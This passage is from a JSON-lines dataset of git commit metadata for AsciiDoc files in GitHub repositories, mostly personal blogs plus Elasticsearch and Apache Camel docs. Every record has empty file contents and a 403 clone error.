2016-05-03-The-Final-Blog-Post.adoc","repos":"wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io","old_file":"_posts\/2016-05-03-The-Final-Blog-Post.adoc","new_file":"_posts\/2016-05-03-The-Final-Blog-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wattsap\/wattsap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b97f76beb3ea3f71c2405a5bef7ea1c5ed0ef6fe","subject":"y2b create post Google's Gaming Console?","message":"y2b create post Google's Gaming Console?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-28-Googles-Gaming-Console.adoc","new_file":"_posts\/2014-06-28-Googles-Gaming-Console.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4761b701eb7d8c0af1ba6153ddbb19a31eac401d","subject":"#11: Fix links","message":"#11: Fix links","repos":"netzwerg\/paleo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netzwerg\/paleo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a45e2efa00d18eccd03a54770a6d7b4aff187515","subject":"fix typo in migrate_6_0\/java.asciidoc","message":"fix typo in 
migrate_6_0\/java.asciidoc\n","repos":"brandonkearby\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,mjason3\/elasticsearch,vroyer\/elassandra,shreejay\/elasticsearch,robin13\/elasticsearch,vroyer\/elasticassandra,ThiagoGarciaAlves\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,nezirus\/elasticsearch,nezirus\/elasticsearch,nezirus\/elasticsearch,scottsom\/elasticsearch,pozhidaevak\/elasticsearch,robin13\/elasticsearch,pozhidaevak\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,brandonkearby\/elasticsearch,mjason3\/elasticsearch,mjason3\/elasticsearch,shreejay\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,wenpos\/elasticsearch,wangtuo\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,brandonkearby\/elasticsearch,jimczi\/elasticsearch,umeshdangat\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,wangtuo\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,vroyer\/elassandra,HonzaKral\/elasticsearch,Stacey-Gammon\/elasticsearch,umeshdangat\/elasticsearch,scottsom\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,rajanm\/elasticsearch,lks21c\/elasticsearch,LeoYao\/elasticsearch,rajanm\/elasticsearch,maddin2016\/elasticsearch,GlenRSmith\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,kalimatas\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,sneivandt\/elasticsearch,pozhidaevak\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,GlenRSmith\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,markwalkom\/elasticsearch,LeoYao\/elasticsearch,lks21c\/elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jimczi\/elasticsearch,nknize\/elasticsearch,mjason3\/elasticsearch,lks21c\/elasticsearch,vroyer\/elasticassandra,robin13\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch,fred84\/elasticsearch,qwerty4030\/elasticsearch,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,coding0011\/elasticsearch,jimczi\/elasticsearch,GlenRSmith\/elasticsearch,jimczi\/elasticsearch,LeoYao\/elasticsearch,LeoYao\/elasticsearch,umeshdangat\/elasticsearch,wenpos\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,s1monw\/elasticsearch,sneivandt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,mohit\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,vroyer\/elassandra,scottsom\/elasticsearch,nknize\/elasticsearch,nezirus\/elasticsearch,maddin2016\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,Stacey-Gammon\/elasticsearch,navee
nhooda2000\/elasticsearch,mohit\/elasticsearch,shreejay\/elasticsearch,strapdata\/elassandra,fred84\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,brandonkearby\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,nknize\/elasticsearch,sneivandt\/elasticsearch,scorpionvicky\/elasticsearch,qwerty4030\/elasticsearch,shreejay\/elasticsearch,uschindler\/elasticsearch,kalimatas\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,sneivandt\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,brandonkearby\/elasticsearch,Stacey-Gammon\/elasticsearch,s1monw\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,naveenhooda2000\/elasticsearch,masaruh\/elasticsearch,qwerty4030\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,markwalkom\/elasticsearch,naveenhooda2000\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,kalimatas\/elasticsearch","old_file":"docs\/reference\/migration\/migrate_6_0\/java.asciidoc","new_file":"docs\/reference\/migration\/migrate_6_0\/java.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b949b62076642c89530995ea2eb167fa21276b06","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04d01c8578affd068eab208fc3d7c335f6af0273","subject":"\u0414\u043e\u0434\u0430\u0434\u0435\u043d .adoc \u0444\u0430\u0458\u043b\u043e\u0442 \u0437\u0430 \u0410\u0412-10","message":"\u0414\u043e\u0434\u0430\u0434\u0435\u043d .adoc \u0444\u0430\u0458\u043b\u043e\u0442 \u0437\u0430 \u0410\u0412-10","repos":"finki-mk\/OOP,finki-mk\/OOP","old_file":"docs\/src\/oop_av10.adoc","new_file":"docs\/src\/oop_av10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/finki-mk\/OOP.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd09c7fd800e95b15a33eda6525e3b011896d267","subject":"Worked on documentation","message":"Worked on documentation\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ed3c47b12bfb7499da26d851608257c43760a1dc","subject":"Update 2016-01-11-OpenGL-ES-android-La-libreria-de-la-que-me-he-enamorado.adoc","message":"Update 
2016-01-11-OpenGL-ES-android-La-libreria-de-la-que-me-he-enamorado.adoc","repos":"acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io","old_file":"_posts\/2016-01-11-OpenGL-ES-android-La-libreria-de-la-que-me-he-enamorado.adoc","new_file":"_posts\/2016-01-11-OpenGL-ES-android-La-libreria-de-la-que-me-he-enamorado.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acien101\/acien101.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc6a1b422ac95e35b01f20b884eb77c3c6079036","subject":"CAMEL-10612: adding reactive-streams documentation","message":"CAMEL-10612: adding reactive-streams documentation\n","repos":"tadayosi\/camel,drsquidop\/camel,chirino\/camel,sverkera\/camel,objectiser\/camel,NickCis\/camel,jkorab\/camel,tdiesler\/camel,onders86\/camel,pmoerenhout\/camel,dmvolod\/camel,tdiesler\/camel,christophd\/camel,prashant2402\/camel,mcollovati\/camel,NickCis\/camel,tlehoux\/camel,driseley\/camel,tlehoux\/camel,acartapanis\/camel,jonmcewen\/camel,pax95\/camel,pkletsko\/camel,ssharma\/camel,cunningt\/camel,zregvart\/camel,tlehoux\/camel,pax95\/camel,pax95\/camel,cunningt\/camel,ssharma\/camel,scranton\/camel,RohanHart\/camel,alvinkwekel\/camel,rmarting\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,zregvart\/camel,Thopap\/camel,davidkarlsen\/camel,snurmine\/camel,nicolaferraro\/camel,alvinkwekel\/camel,curso007\/camel,kevinearls\/camel,mcollovati\/camel,nboukhed\/camel,onders86\/camel,yuruki\/camel,drsquidop\/camel,jkorab\/camel,Fabryprog\/camel,Fabryprog\/camel,mgyongyosi\/camel,rmarting\/camel,jonmcewen\/camel,DariusX\/camel,CodeSmell\/camel,lburgazzoli\/apache-camel,acartapanis\/camel,pkletsko\/camel,anoordover\/camel,RohanHart\/camel,gautric\/camel,anton-k11\/camel,nicolaferraro\/camel,mcollovati\/camel,tlehoux\/camel,CodeSmell\/camel,lburgazzoli\/camel,zregvart\/camel,jamesnetherton\/camel,rmarting\/camel,chirino\/camel,yuruki\/camel,rmarting\/camel,kevinearls\/camel,christophd\/camel,adessaigne\/camel,pax95\/camel,jonmcewen\/camel,lburgazzoli\/apache-camel,driseley\/camel,apache\/camel,dmvolod\/camel,christophd\/camel,allancth\/camel,kevinearls\/camel,nboukhed\/camel,prashant2402\/camel,RohanHart\/camel,DariusX\/camel,jonmcewen\/camel,nboukhed\/camel,akhettar\/camel,NickCis\/camel,jkorab\/camel,tlehoux\/camel,kevinearls\/camel,lburgazzoli\/camel,NickCis\/camel,sverkera\/camel,isavin\/camel,objectiser\/camel,isavin\/camel,yuruki\/camel,davidkarlsen\/camel,DariusX\/camel,ssharma\/camel,zregvart\/camel,nicolaferraro\/camel,mcollovati\/camel,anton-k11\/camel,prashant2402\/camel,anoordover\/camel,christophd\/camel,gnodet\/camel,pkletsko\/camel,pkletsko\/camel,anoordover\/camel,NickCis\/camel,ullgren\/camel,allancth\/camel,lburgazzoli\/camel,jamesnetherton\/camel,gautric\/camel,allancth\/camel,pmoerenhout\/camel,tadayosi\/camel,NickCis\/camel,chirino\/camel,tadayosi\/camel,yuruki\/camel,acartapanis\/camel,chirino\/camel,allancth\/camel,anoordover\/camel,akhettar\/camel,tadayosi\/camel,drsquidop\/camel,jonmcewen\/camel,lburgazzoli\/apache-camel,tdiesler\/camel,curso007\/camel,curso007\/camel,tdiesler\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,mgyongyosi\/camel,christophd\/camel,prashant2402\/camel,prashant2402\/camel,alvinkwekel\/camel,akhettar\/camel,dmvolod\/camel,lburgazzoli\/apache-camel,sverkera\/camel,CodeSmell\/camel,chirino\/camel,DariusX\/camel,jkorab\/camel,mgyongyosi\/camel,dmvolod\/camel,jkor
ab\/camel,christophd\/camel,isavin\/camel,acartapanis\/camel,jamesnetherton\/camel,salikjan\/camel,adessaigne\/camel,akhettar\/camel,onders86\/camel,Fabryprog\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,adessaigne\/camel,scranton\/camel,driseley\/camel,driseley\/camel,adessaigne\/camel,ullgren\/camel,scranton\/camel,lburgazzoli\/apache-camel,pmoerenhout\/camel,adessaigne\/camel,pax95\/camel,ullgren\/camel,acartapanis\/camel,adessaigne\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,nboukhed\/camel,kevinearls\/camel,anoordover\/camel,objectiser\/camel,driseley\/camel,lburgazzoli\/apache-camel,Thopap\/camel,sverkera\/camel,scranton\/camel,isavin\/camel,Thopap\/camel,isavin\/camel,chirino\/camel,allancth\/camel,kevinearls\/camel,apache\/camel,ssharma\/camel,pmoerenhout\/camel,snurmine\/camel,RohanHart\/camel,akhettar\/camel,snurmine\/camel,apache\/camel,Thopap\/camel,rmarting\/camel,onders86\/camel,yuruki\/camel,apache\/camel,snurmine\/camel,davidkarlsen\/camel,anton-k11\/camel,sverkera\/camel,ssharma\/camel,prashant2402\/camel,cunningt\/camel,tadayosi\/camel,gautric\/camel,isavin\/camel,nikhilvibhav\/camel,scranton\/camel,driseley\/camel,tlehoux\/camel,snurmine\/camel,apache\/camel,cunningt\/camel,davidkarlsen\/camel,gnodet\/camel,scranton\/camel,drsquidop\/camel,objectiser\/camel,curso007\/camel,nboukhed\/camel,anton-k11\/camel,yuruki\/camel,tdiesler\/camel,nboukhed\/camel,pkletsko\/camel,anton-k11\/camel,jamesnetherton\/camel,curso007\/camel,CodeSmell\/camel,mgyongyosi\/camel,jonmcewen\/camel,onders86\/camel,Thopap\/camel,anoordover\/camel,punkhorn\/camel-upstream,ullgren\/camel,allancth\/camel,jamesnetherton\/camel,RohanHart\/camel,lburgazzoli\/camel,snurmine\/camel,apache\/camel,gnodet\/camel,dmvolod\/camel,cunningt\/camel,pax95\/camel,salikjan\/camel,mgyongyosi\/camel,gnodet\/camel,gautric\/camel,pkletsko\/camel,jamesnetherton\/camel,gautric\/camel,akhettar\/camel,mgyongyosi\/camel,tdiesler\/camel,gautric\/camel,drsquidop\/camel,curso007\/camel,lburgazzoli\/camel,Fabryprog\/camel,Thopap\/camel,cunningt\/camel,rmarting\/camel,jkorab\/camel,tadayosi\/camel,dmvolod\/camel,sverkera\/camel,acartapanis\/camel,punkhorn\/camel-upstream,onders86\/camel,gnodet\/camel,lburgazzoli\/camel,RohanHart\/camel,alvinkwekel\/camel,anton-k11\/camel,ssharma\/camel,drsquidop\/camel","old_file":"components\/camel-reactive-streams\/src\/main\/docs\/reactive-streams-component.adoc","new_file":"components\/camel-reactive-streams\/src\/main\/docs\/reactive-streams-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9cfbe154e8699d15f7ad985ca7fadf854284aa7e","subject":"Update 2017-08-17-IDE.adoc","message":"Update 2017-08-17-IDE.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-08-17-IDE.adoc","new_file":"_posts\/2017-08-17-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a46db46dc80efd016a38d094063f3eb9723130df","subject":"Update 2015-06-05-Grails-Ordenar-uma-classe-de-dominio-por-mais-de-um-campo.adoc","message":"Update 
2015-06-05-Grails-Ordenar-uma-classe-de-dominio-por-mais-de-um-campo.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2015-06-05-Grails-Ordenar-uma-classe-de-dominio-por-mais-de-um-campo.adoc","new_file":"_posts\/2015-06-05-Grails-Ordenar-uma-classe-de-dominio-por-mais-de-um-campo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc134940c3da3b0e21feb23f56433643ed1fa4cd","subject":"Update 2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","message":"Update 2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b80694a37de34898bf8decfb541d114887bb5948","subject":"Update 2016-04-05-Local-File-Inclusion.adoc","message":"Update 2016-04-05-Local-File-Inclusion.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Local-File-Inclusion.adoc","new_file":"_posts\/2016-04-05-Local-File-Inclusion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08617f0285774bb319b64c09b983a882c1415298","subject":"Update 2016-05-13-Maniobras-Defensivas.adoc","message":"Update 2016-05-13-Maniobras-Defensivas.adoc","repos":"allancorra\/allancorra.github.io,allancorra\/allancorra.github.io,allancorra\/allancorra.github.io,allancorra\/allancorra.github.io","old_file":"_posts\/2016-05-13-Maniobras-Defensivas.adoc","new_file":"_posts\/2016-05-13-Maniobras-Defensivas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancorra\/allancorra.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0114246bb0f0c8705d8d306e49b4ac2895a3eed8","subject":"Update 2016-04-06-Breakfast-in-Fantasyland.adoc","message":"Update 2016-04-06-Breakfast-in-Fantasyland.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-04-06-Breakfast-in-Fantasyland.adoc","new_file":"_posts\/2016-04-06-Breakfast-in-Fantasyland.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76d0674d7b02c42fcd110ce87fa19600191a4eb9","subject":"fixes #169 document websocket transport","message":"fixes #169 document websocket 
transport\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"docs\/nng_ws.adoc","new_file":"docs\/nng_ws.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb3008d5b926dca66c57eb1913c8e01369b316db","subject":"Update 2015-03-05-Encore-un-test.adoc","message":"Update 2015-03-05-Encore-un-test.adoc","repos":"fbridault\/sandblog,fbridault\/sandblog,fbridault\/sandblog","old_file":"_posts\/2015-03-05-Encore-un-test.adoc","new_file":"_posts\/2015-03-05-Encore-un-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbridault\/sandblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a47334816e83cf78f0b60384a25ba9d099a38411","subject":"Update 2015-11-23-InserstionSort.adoc","message":"Update 2015-11-23-InserstionSort.adoc","repos":"mhmtbsbyndr\/mhmtbsbyndr.github.io,mhmtbsbyndr\/mhmtbsbyndr.github.io,mhmtbsbyndr\/mhmtbsbyndr.github.io","old_file":"_posts\/2015-11-23-InserstionSort.adoc","new_file":"_posts\/2015-11-23-InserstionSort.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mhmtbsbyndr\/mhmtbsbyndr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ef3fa06b95611dbf8c26013f147f7a32b267d51","subject":"Update 2018-10-21-.adoc","message":"Update 2018-10-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-21-.adoc","new_file":"_posts\/2018-10-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dc05eb5d1e5b261dbc1e2fccbab6dc3f4456ed4","subject":"Update 2016-04-01-Welcome.adoc","message":"Update 2016-04-01-Welcome.adoc","repos":"Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io","old_file":"_posts\/2016-04-01-Welcome.adoc","new_file":"_posts\/2016-04-01-Welcome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Perthmastersswimming\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e409177b38963e47a8da33ff818f856295f14880","subject":"Update 2016-05-21-New-Dawn.adoc","message":"Update 2016-05-21-New-Dawn.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-05-21-New-Dawn.adoc","new_file":"_posts\/2016-05-21-New-Dawn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b669e37c0b2d5b67ae3416ca15584a924f0bc22b","subject":"Docs: updated resilience page","message":"Docs: updated resilience 
page\n","repos":"elancom\/elasticsearch,qwerty4030\/elasticsearch,smflorentino\/elasticsearch,btiernay\/elasticsearch,artnowo\/elasticsearch,vingupta3\/elasticsearch,avikurapati\/elasticsearch,naveenhooda2000\/elasticsearch,Charlesdong\/elasticsearch,vietlq\/elasticsearch,yongminxia\/elasticsearch,jimhooker2002\/elasticsearch,lmtwga\/elasticsearch,mmaracic\/elasticsearch,ouyangkongtong\/elasticsearch,snikch\/elasticsearch,sauravmondallive\/elasticsearch,lzo\/elasticsearch-1,kenshin233\/elasticsearch,strapdata\/elassandra,Ansh90\/elasticsearch,wangyuxue\/elasticsearch,Chhunlong\/elasticsearch,yanjunh\/elasticsearch,hirdesh2008\/elasticsearch,pritishppai\/elasticsearch,rhoml\/elasticsearch,episerver\/elasticsearch,phani546\/elasticsearch,ckclark\/elasticsearch,JervyShi\/elasticsearch,jpountz\/elasticsearch,coding0011\/elasticsearch,wangtuo\/elasticsearch,hanst\/elasticsearch,zhiqinghuang\/elasticsearch,ESamir\/elasticsearch,easonC\/elasticsearch,luiseduardohdbackup\/elasticsearch,Chhunlong\/elasticsearch,luiseduardohdbackup\/elasticsearch,davidvgalbraith\/elasticsearch,abibell\/elasticsearch,NBSW\/elasticsearch,ivansun1010\/elasticsearch,sposam\/elasticsearch,episerver\/elasticsearch,kaneshin\/elasticsearch,alexshadow007\/elasticsearch,bestwpw\/elasticsearch,tebriel\/elasticsearch,wuranbo\/elasticsearch,truemped\/elasticsearch,szroland\/elasticsearch,markharwood\/elasticsearch,davidvgalbraith\/elasticsearch,TonyChai24\/ESSource,nellicus\/elasticsearch,kalburgimanjunath\/elasticsearch,i-am-Nathan\/elasticsearch,Charlesdong\/elasticsearch,himanshuag\/elasticsearch,sdauletau\/elasticsearch,robin13\/elasticsearch,MetSystem\/elasticsearch,rlugojr\/elasticsearch,NBSW\/elasticsearch,areek\/elasticsearch,mute\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,jprante\/elasticsearch,strapdata\/elassandra5-rc,uschindler\/elasticsearch,nellicus\/elasticsearch,cnfire\/elasticsearch-1,djschny\/elasticsearch,ThalaivaStars\/OrgRepo1,myelin\/elasticsearch,geidies\/elasticsearch,khiraiwa\/elasticsearch,lks21c\/elasticsearch,18098924759\/elasticsearch,vietlq\/elasticsearch,dongjoon-hyun\/elasticsearch,henakamaMSFT\/elasticsearch,lchennup\/elasticsearch,vvcephei\/elasticsearch,tsohil\/elasticsearch,infusionsoft\/elasticsearch,Siddartha07\/elasticsearch,adrianbk\/elasticsearch,pozhidaevak\/elasticsearch,dylan8902\/elasticsearch,sneivandt\/elasticsearch,fred84\/elasticsearch,markwalkom\/elasticsearch,mkis-\/elasticsearch,dpursehouse\/elasticsearch,onegambler\/elasticsearch,dataduke\/elasticsearch,lzo\/elasticsearch-1,apepper\/elasticsearch,likaiwalkman\/elasticsearch,masaruh\/elasticsearch,caengcjd\/elasticsearch,xpandan\/elasticsearch,mmaracic\/elasticsearch,abibell\/elasticsearch,hirdesh2008\/elasticsearch,sauravmondallive\/elasticsearch,mbrukman\/elasticsearch,Chhunlong\/elasticsearch,ZTE-PaaS\/elasticsearch,s1monw\/elasticsearch,myelin\/elasticsearch,scorpionvicky\/elasticsearch,andrejserafim\/elasticsearch,skearns64\/elasticsearch,cwurm\/elasticsearch,kunallimaye\/elasticsearch,adrianbk\/elasticsearch,sdauletau\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,achow\/elasticsearch,MjAbuz\/elasticsearch,huanzhong\/elasticsearch,kenshin233\/elasticsearch,iamjakob\/elasticsearch,HonzaKral\/elasticsearch,iamjakob\/elasticsearch,Rygbee\/elasticsearch,tkssharma\/elasticsearch,caengcjd\/elasticsearch,knight1128\/elasticsearch,NBSW\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,Uiho\/elasticsearch,YosuaMichael\/elasticsearch,linglaiyao1314\/elasticsearch,wimvds\/elasticsearch,trangvh\/elasticsearch,TonyCh
ai24\/ESSource,szroland\/elasticsearch,karthikjaps\/elasticsearch,sauravmondallive\/elasticsearch,mbrukman\/elasticsearch,lchennup\/elasticsearch,aglne\/elasticsearch,thecocce\/elasticsearch,brandonkearby\/elasticsearch,chirilo\/elasticsearch,mjhennig\/elasticsearch,scorpionvicky\/elasticsearch,jpountz\/elasticsearch,LewayneNaidoo\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,fooljohnny\/elasticsearch,jbertouch\/elasticsearch,feiqitian\/elasticsearch,mute\/elasticsearch,onegambler\/elasticsearch,jango2015\/elasticsearch,kingaj\/elasticsearch,MichaelLiZhou\/elasticsearch,markharwood\/elasticsearch,LeoYao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,episerver\/elasticsearch,nellicus\/elasticsearch,yynil\/elasticsearch,nezirus\/elasticsearch,winstonewert\/elasticsearch,iantruslove\/elasticsearch,spiegela\/elasticsearch,knight1128\/elasticsearch,ulkas\/elasticsearch,franklanganke\/elasticsearch,girirajsharma\/elasticsearch,diendt\/elasticsearch,scorpionvicky\/elasticsearch,TonyChai24\/ESSource,pablocastro\/elasticsearch,MjAbuz\/elasticsearch,kingaj\/elasticsearch,artnowo\/elasticsearch,KimTaehee\/elasticsearch,gfyoung\/elasticsearch,jeteve\/elasticsearch,umeshdangat\/elasticsearch,elasticdog\/elasticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,18098924759\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,drewr\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,StefanGor\/elasticsearch,hydro2k\/elasticsearch,ImpressTV\/elasticsearch,C-Bish\/elasticsearch,aglne\/elasticsearch,adrianbk\/elasticsearch,Rygbee\/elasticsearch,knight1128\/elasticsearch,lydonchandra\/elasticsearch,kingaj\/elasticsearch,hua